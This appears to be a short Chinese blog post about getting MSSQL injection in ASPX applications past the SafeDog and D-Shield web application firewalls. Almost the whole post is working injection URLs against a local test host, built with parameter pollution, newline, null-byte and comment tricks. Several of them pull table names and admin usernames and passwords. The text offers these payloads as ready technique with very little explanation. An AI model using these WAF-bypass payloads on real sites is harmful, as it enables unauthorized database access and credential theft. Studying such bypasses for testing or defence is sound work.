ASPX Bypass 安全狗/D盾
4_21前言:之前只好好的学过mysql注入,最近想把mssql注入学一遍,顺便试试能否绕过安全狗/D盾
第一种:HPP参数污染 + 换行符%0a + msssql特性
初步绕过:
http://192.168.1.167/aspxmssql/sql.aspx?id=1e2union/*&id=*/--xxx%0a/**/all select user,'2','3'
.符号修饰绕过,下面的语句只能靠.
来进行绕过
http://192.168.1.167/aspxmssql/sql.aspx?id=1e2union/*&id=*/--xxx%0a/**/all select table_name,'2','3' from (select table_name from.information_schema.tables where table_name != 'cmd')a
http://192.168.1.167/aspxmssql/sql.aspx?id=1e2union/*&id=*/--xxx%0a/**/all select(select top 2 table_name from.information_schema.tables where table_name != 'cmd'),'2','3';
第二种:注释符 + 单引号
关键词:--x%0a
http://192.168.1.167/aspxmssql/sql.aspx?id=-1e-union--x%0aall(select table_name,'2','3' from information_schema.tables)
http://192.168.1.167/aspxmssql/sql.aspx?id=-1e-union--x%0aall(select username,'2','3' from admin where id=1)
//这里整形加上单引号才能绕过!
第三种:fuzz空白/填充符 + ALL/DISTINCT筛选
关键词:[0x00-0x20]
http://192.168.1.167/aspxmssql/sql.aspx?id=-1e-union%01all select table_name,'2','3' from information_schema.tables
http://192.168.1.167/aspxmssql/sql.aspx?id=-1e-union%01all select password,'2','3' from admin where id=1
到了这里继续测试D盾,环境真糟糕,08r2的机器竟然无法安装D盾
第一种:HPP参数污染 + %00截断干扰 + 换行符
http://192.168.1.165/aspxmssql/sql.aspx/a.jsp?id=1e2%00%0aunion--%23&id=%00%0aall--%23&id=%00%0aselect @@version,'2','3'
出数据:http://192.168.1.165/aspxmssql/sql.aspx/a.jsp?id=1e2%00%0aunion--%23&id=%00%0aall--%23&id=%00%0a(select password,'2','3' from admin where id=1)
【推荐】国内首个AI IDE,深度理解中文开发场景,立即下载体验Trae
【推荐】编程新体验,更懂你的AI,立即体验豆包MarsCode编程助手
【推荐】抖音旗下AI助手豆包,你的智能百科全书,全免费不限次数
【推荐】轻量又高性能的 SSH 工具 IShell:AI 加持,快人一步
· 开发者必知的日志记录最佳实践
· SQL Server 2025 AI相关能力初探
· Linux系列:如何用 C#调用 C方法造成内存泄露
· AI与.NET技术实操系列(二):开始使用ML.NET
· 记一次.NET内存居高不下排查解决与启示
· 开源Multi-agent AI智能体框架aevatar.ai,欢迎大家贡献代码
· Manus重磅发布:全球首款通用AI代理技术深度解析与实战指南
· 被坑几百块钱后,我竟然真的恢复了删除的微信聊天记录!
· 没有Manus邀请码?试试免邀请码的MGX或者开源的OpenManus吧
· 园子的第一款AI主题卫衣上架——"HELLO! HOW CAN I ASSIST YOU TODAY